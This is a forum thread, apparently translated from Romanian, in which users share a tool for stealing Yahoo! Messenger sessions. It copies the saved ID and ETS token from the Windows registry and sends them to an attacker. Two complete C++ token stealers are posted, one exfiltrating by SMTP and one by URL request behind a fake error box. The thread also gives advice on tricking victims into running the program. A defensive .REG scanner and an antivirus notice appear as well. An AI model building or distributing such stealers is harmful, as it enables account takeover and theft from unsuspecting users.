Guest chri5ty, posted February 6, 2009 (edited)
This is probably the simplest method of breaking into a Messenger account. To hell with keyloggers... binders... FTPs... all of that just to steal a password... When you log in to Yahoo! Messenger, you have the option of saving the ID and password for later logins. The ID is saved in the registry, and another code, ETS, is saved as well, which holds the authentication token. The password cannot be extracted from the token. What does that mean? If you extract those 2 pieces of information from the registry and then "plant" them on another computer, you will be surprised to find that you can log in with the saved ID and password, that is, into someone else's account, without necessarily learning their password. Simple, isn't it? I made a small exe in C++, which you can find archived here. When it is run, it extracts the ID and the ETS and sends them to a server. Some explanations in English can be found here. Give the exe to someone and convince them to open it. The program will display a fake error message. Go to http://it.octopis.com/ets.php, enter the ID, and see whether the operation succeeded. If it did, the ID and the ETS code are displayed. Click the ID to download a .REG file, which you then run. Open Messenger and surprise!! You are logged in under that ID! You have access to the whole Yahoo! account, plus, since you have access to the e-mail account, you can break into their hi5 / netlog / tagged accounts (and other junk sites)... HAPPY STEALING! The program is small and based on a very simple principle, and I keep the source under lock and key, for the curious. The site it.octopis.com is my site, so it doesn't hurt to take a look. I've put up 3-4 little programs and I'm too lazy... to add a few more.
Edited February 6, 2009 by chri5ty
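The mechanism described in the post works because the "remember my ID and password" option persists a bearer token (the ETS value) next to the user ID under HKEY_CURRENT_USER\Software\Yahoo\Pager, and the downloaded .REG file is what replays those two values on a second machine. The Python script below is an added defensive example, not code from the original post or from it.octopis.com: it parses a .REG file in the standard "Windows Registry Editor Version 5.00" syntax and flags any write of those two values, so an analyst can inspect a suspicious .REG file before it is imported. The sample file and its token value are constructed, and the watchlist is an assumption built only from the registry path and value names given in the post; the parser itself is generic (key deletion, default values, multi-line hex data).

```python
"""Scan a Windows .REG file for entries that plant a saved Yahoo! Messenger
session: the "Yahoo! User ID" and "ETS" values under HKCU\\Software\\Yahoo\\Pager.

Added defensive example, not code from the thread. The .REG handling follows
the generic "Windows Registry Editor Version 5.00" syntax; the watchlist is an
assumption built only from the registry path and value names named in the thread.
"""
import re
from typing import Dict, List, Optional, Tuple

# Assumed watchlist: key path -> value names whose write means a saved login
# session is being planted on this machine (compared case-insensitively).
WATCHLIST: Dict[str, set] = {
    r"HKEY_CURRENT_USER\Software\Yahoo\Pager": {"yahoo! user id", "ets"},
}

_SECTION = re.compile(r"^\[(-?)([^\]]+)\]$")
_VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def _unescape(s: str) -> str:
    # Undo .REG backslash escaping, e.g. \" and \\
    return re.sub(r"\\(.)", r"\1", s)


def _decode(data: str) -> str:
    # Quoted string data is unescaped; dword:, hex: and "-" (delete) stay as written
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return _unescape(data[1:-1])
    return data


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: data}} for the writes in a .REG file.

    Handles the version header, comments, key deletion ([-KEY], whose values
    are ignored), the default value (@) and data continued over several lines
    with a trailing backslash (typical for hex: blobs).
    """
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None              # section being read; None after [-KEY]
    pending: Optional[Tuple[str, str]] = None  # (name, partial data) of a continued value
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:
            name, data = pending
            data += line.rstrip("\\")
            if line.endswith("\\"):
                pending = (name, data)
                continue
            pending = None
            if current is not None:
                keys[current][name] = _decode(data)
            continue
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        m = _SECTION.match(line)
        if m:
            current = None if m.group(1) == "-" else m.group(2).strip()
            if current is not None:
                keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m is None or current is None:
            continue                            # malformed line, or a value under [-KEY]
        name = "@" if m.group(2) else _unescape(m.group(1))
        data = m.group(3).strip()
        if data.endswith("\\"):
            pending = (name, data.rstrip("\\"))
        else:
            keys[current][name] = _decode(data)
    return keys


def find_planted_sessions(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, data) for every watchlisted value the file writes.

    A "name"=- line deletes the value and is the cleanup step, not a plant.
    """
    lowered = {k.lower(): v for k, v in WATCHLIST.items()}
    hits = []
    for key, values in parse_reg(text).items():
        watched = lowered.get(key.lower())
        if not watched:
            continue
        for name, data in values.items():
            if name.lower() in watched and data != "-":
                hits.append((key, name, data))
    return hits


# Constructed sample of what a "plant the session" file looks like; the token is a placeholder.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

; constructed sample, not a real capture
[HKEY_CURRENT_USER\Software\Yahoo\Pager]
"Yahoo! User ID"="example_user"
"ETS"="EXAMPLE-TOKEN-PLACEHOLDER"
"Unrelated"=dword:00000001

[HKEY_CURRENT_USER\Software\Example\Other]
"Blob"=hex:01,02,\
  03,04
"""

if __name__ == "__main__":
    for key, name, data in find_planted_sessions(SAMPLE_REG):
        print(f"saved-session write: [{key}] {name!r} = {data!r}")
```

Run against the constructed sample it reports the two planted values and ignores the unrelated ones; a file that only deletes the values (`"ETS"=-`, or a `[-HKEY_CURRENT_USER\Software\Yahoo\Pager]` section) produces no hit, since that is the cleanup rather than the plant. Note that deleting the local values does not invalidate a copy of the token that has already been sent elsewhere: the token is a bearer credential, so an account that was exposed this way needs its password changed.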
Hertz, posted February 6, 2009
If you don't show us the source, you're not TRU.
MostWanteD, posted February 6, 2009
interesting stuff.. but you basically have access to all the IDs on there ...
fLr^, posted February 7, 2009
very interesting stuff, and it works very well. I tested it
s33us00n, posted February 7, 2009
and unless you make your own you'll be labelled a script kiddie
Sharcky, posted February 7, 2009
chri5ty only 17 years old? :O You're damn good at this age!!
Guest chri5ty, posted February 8, 2009
> If you don't show us the source, you're not TRU.
I explained in detail what it does. Browse the registry, your hand won't fall off. Locate the 2 keys and write the code yourselves. Mine fit in 15 lines. :rolleyes: Maybe I'll post the source. The idea was for everyone to think about how it's done, because otherwise some 'Copy/Paste' guy comes along, adds the code fragment to his program, then brags about it as some hacking tool of his, an absolutely spectacular "nee-naw nee-naw" trojan, when the program in question is "simply too simple".
> interesting stuff.. but you basically have access to all the IDs on there ...
Exactly. On the search page I have a few secret parameters through which I can see the list of IDs. When I had 10-20 entries I would still look through them, and sometimes I saw that they belonged to people who don't deserve to get 'slapped' by some snotty kid who decided to break into their account. Since I've had 50 of them, I'm really no longer interested in trying every ID.
> and unless you make your own you'll be labelled a script kiddie
What exactly do you mean?
> chri5ty only 17 years old? :O You're damn good at this age!!
16.5 years, thanks.. I started with HTML in the 5th grade, Pascal in the 6th, and C in the 7th. In the 9th grade, during the summer holiday, i.e. last summer, I learned C++ to perfection. :cool:
zaiet-pagadi, posted February 8, 2009 (edited)
Ok, nice program. I enable Deep Freeze or VMware, run it without an internet connection, extract the MVC++ executable, decompile it after installing and there's the source code... big deal for those who want the source... try making it in Pascal or Delphi and you're "the daddy". The question is the following: if the victim runs it without a net connection, what happens? Is the log file with the login data "stored" somewhere on the HDD, and when it "sees" a bit of net it sends the data?
Edited February 8, 2009 by zaiet-pagadi
Rebell, posted February 8, 2009
A bit more and you'll make it to Microsoft, keep it up
Guest chri5ty, posted February 8, 2009
> Ok, nice program. I enable Deep Freeze or VMware, run it without an internet connection, extract the MVC++ executable, decompile it after installing and there's the source code... big deal for those who want the source... try making it in Pascal or Delphi and you're "the daddy". The question is the following: if the victim runs it without a net connection, what happens? Is the log file with the login data "stored" somewhere on the HDD, and when it "sees" a bit of net it sends the data?
What do you need Deep Freeze for? (haha) It's a microscopic executable and I guarantee it does what it says. If there is no net connection, nothing is stored. I wasn't interested in that aspect at all. And I don't think you can decompile it. Maybe only if you disassemble it. And even so, you'd only be proving to me that you lack a ton of creativity. It's very simple, damn it! I'm addressing programmers of below-average, or at least average, level.
vfather, posted February 8, 2009
it's super simple, in AutoIT I wrote it in 3 lines of code.
Ethereal, posted February 8, 2009

    #include <fstream>
    #include <iostream>
    #include <cstdlib>
    #include <windows.h>
    using namespace std;

    char data[1000];
    char bufferout[1000];
    char bufferin[1000];
    char ip[100];
    char mail[100];
    int port;
    SOCKET asock, bsock;
    SOCKADDR_IN sina, sinb;
    WSADATA wsadata;

    int checkKey(HKEY tree, const char *folder, char *key)
    {
        long lRet;
        HKEY hKey;
        char temp[150];
        DWORD dwBufLen;

        // Open location
        lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey );
        if (lRet != ERROR_SUCCESS)
            return 0;

        // Get key
        dwBufLen = sizeof(temp);
        lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen );
        if (lRet != ERROR_SUCCESS)
            return 0;
        strcpy(data+strlen(data), temp);
        data[strlen(data)]=' ';

        // Close key
        lRet = RegCloseKey( hKey );
        if (lRet != ERROR_SUCCESS)
            return 0;

        // Got this far, then key exists
        return 1;
    }

    int errorcheck()
    {
        if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;}
        if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1;
        if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0;
        return 1;
    }

    int main()
    {
        mail[0]='<';
        strcpy(mail+1, "mailto@yahoo.com");
        mail[strlen(mail)+2]='\0';
        mail[strlen(mail)+1]='\n';
        mail[strlen(mail)]='>';
        for(int i=0; i<sizeof(data); i++) data[i]='\0';
        checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
        checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");
    login:
        strcpy(ip,"67.195.168.31");
        port=25;
        WSAStartup(0x101,&wsadata);
        bsock=socket(AF_INET, SOCK_STREAM, 0);
        sinb.sin_family=AF_INET;
        sinb.sin_addr.s_addr=inet_addr(ip);
        sinb.sin_port=htons(port);
        connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) );
        recv( bsock, bufferin, sizeof(bufferin), 0);
        cout<<bufferin;
        Sleep(200);
        cout<<"\n";
        if(!errorcheck()) {
            cout<<"restart";
            WSACleanup();
            goto login;
        }
        else cout<<"Connected.\n";
        Sleep(30);
        //FROM
        strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
        cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n";
        send(bsock, bufferout, strlen(bufferout),0);
        recv( bsock, bufferin, sizeof(bufferin), 0);
        cout<<bufferin;
        //RCPT TO
        strcpy(bufferout, "RCPT TO: ");
        strcpy(bufferout+strlen(bufferout), mail);
        cout<<bufferout;
        send(bsock, bufferout, strlen(bufferout),0);
        recv( bsock, bufferin, sizeof(bufferin), 0);
        cout<<bufferin;
        // DATA
        strcpy(bufferout, "DATA\n");
        send(bsock, bufferout, strlen(bufferout),0);
        recv( bsock, bufferin, sizeof(bufferin), 0);
        cout<<bufferin;
        Sleep(30);
        strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
        strcpy(bufferout+strlen(bufferout), data);
        strcpy(bufferout+strlen(bufferout),"\n\0");
        send(bsock, bufferout, strlen(bufferout),0);
        strcpy(bufferout, "\r\n.\r\n");
        send(bsock, bufferout, strlen(bufferout),0);
        recv( bsock, bufferin, sizeof(bufferin), 0);
        cout<<bufferin;
        strcpy(bufferout,"quit\n");
        send(bsock, bufferout, strlen(bufferout),0);
        cout<<"\nEnd of the world.";
        cin.get();
    }
zaiet-pagadi, posted February 8, 2009 (edited)
> What do you need Deep Freeze for? (haha) It's a microscopic executable and I guarantee it does what it says. If there is no net connection, nothing is stored. I wasn't interested in that aspect at all. And I don't think you can decompile it. Maybe only if you disassemble it. And even so, you'd only be proving to me that you lack a ton of creativity. It's very simple, damn it! I'm addressing programmers of below-average, or at least average, level.
Edited... I won't bother... try to take others' advice into account as well, you won't lose anything by it
Edited February 8, 2009 by zaiet-pagadi
Guest chri5ty, posted February 9, 2009
I sent the parameters via URLDownloadToFile. The URL is a php script on the site + parameters, and the destination file is left unspecified.
@zaiet-pagadi - I don't understand, what do you mean?
Hellbound, posted February 9, 2009
I ran it but the nick didn't show up on that page
Guest chri5ty, posted February 10, 2009
> I ran it but the nick didn't show up on that page
Meaning what? What doesn't show up? If you meant that you searched and found nothing for that ID, then it's possible that the person you gave the program to uses multi-mess, in which case they didn't tick "remember my id and password".
Hellbound, posted February 10, 2009
Please, can you specify the source?
> [quotes Ethereal's code from the post above, verbatim]
If this is it, tell me how to compile it, AutoIt, C++? Or please give me the source, I'd like to make a site like that myself.
Guest chri5ty, posted February 11, 2009

    #include <windows.h>
    #include <stdio.h>
    #pragma comment(lib,"user32.lib")
    #pragma comment(lib,"Urlmon.lib")

    void getKey(LPCSTR Path,LPCSTR Key,void*buffer)
    {
        HKEY key;
        unsigned long type=REG_SZ, size=1024;
        if (RegOpenKeyEx(HKEY_CURRENT_USER,Path,0,KEY_READ,&key)!=ERROR_SUCCESS)
            return;
        RegQueryValueEx(key,Key,NULL,&type,(LPBYTE)buffer,&size);
        RegCloseKey(key);
    }

    int WinMain(HINSTANCE,HINSTANCE,LPCSTR,int)
    {
        char buf[1024]="";
        char URL[1024]="****************";
        getKey("Software\\yahoo\\pager","Yahoo! User ID",URL+strlen(URL));
        getKey("Software\\yahoo\\pager","ETS",buf);
        strcat(URL,"********");
        strcat(URL,buf);
        if(strlen(buf)){
            URLDownloadToFile(0,URL,"",0,0);
            MessageBox(0,"Application failed to initialize","Fatal Error",MB_ICONSTOP);
        }
        else MessageBox(0,"Unexpected error in main module","Fatal Error",MB_ICONSTOP);
        return 0;
    }

I hid a few parameters under ***, so that the database doesn't get flooded. There is a password for entries to be accepted.
Hellbound, posted February 11, 2009
Please, can you help me understand. Do I compile this script with C++ to get the executable? And where in the script do I change things to put in my own verification page like you did? Can you make a tut, or if not add me at worldextremehack@yahoo.com
Ovvi, posted February 11, 2009
I have a question too ... if a person ran that program... and another person is using their mail... how can the person who is the victim get out of it? Reinstall Windows? ... or?
Hellbound, posted February 11, 2009
By changing their password! Come on, please chri5ty, explain what I asked you ...
Guest chri5ty, posted February 12, 2009
You replace ****** with some URL fragments, so that in the end you obtain a URL of the form "http://sait.com/cale/script.php?parametru=valoare&parametru=valoare....". It's simpler than it seems, but I'm not going to spell out the parameters on the forum, so that nobody can automatically inflate the database with thousands of meaningless entries. The php script is just as simple as the program. There's really too much discussion on this topic. I only had to give you the idea, and you were to write your own programs on your own.
Hellbound, posted February 12, 2009
Please, I'm asking nicely, add me on my ID, I want to talk a little, please cristi worldextremehack@yahoo.com
Clyde, posted February 20, 2009
Virus: HEUR/Malware
Type: AHeAD Heuristic special detection
In the wild: No
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
Description: HEUR/Malware
HEUR/Malware is a heuristic detection routine designed to detect common malware characteristics. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing. On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with a harmful or virulent file. HEUR/Malware in particular is reported when a program seems to contain suspicious functionality. In the unlikely occurrence of a false positive we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir. A heuristic detection might be a false identification if one or more of the following are true:
- The program has been used for a very long time and is known to the user
- The program was installed by the user himself
- The program is from a trustworthy source
Please note that even old programs can get infected or replaced by malware without your knowledge. Besides that, trustworthy sources might have become compromised themselves. In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis.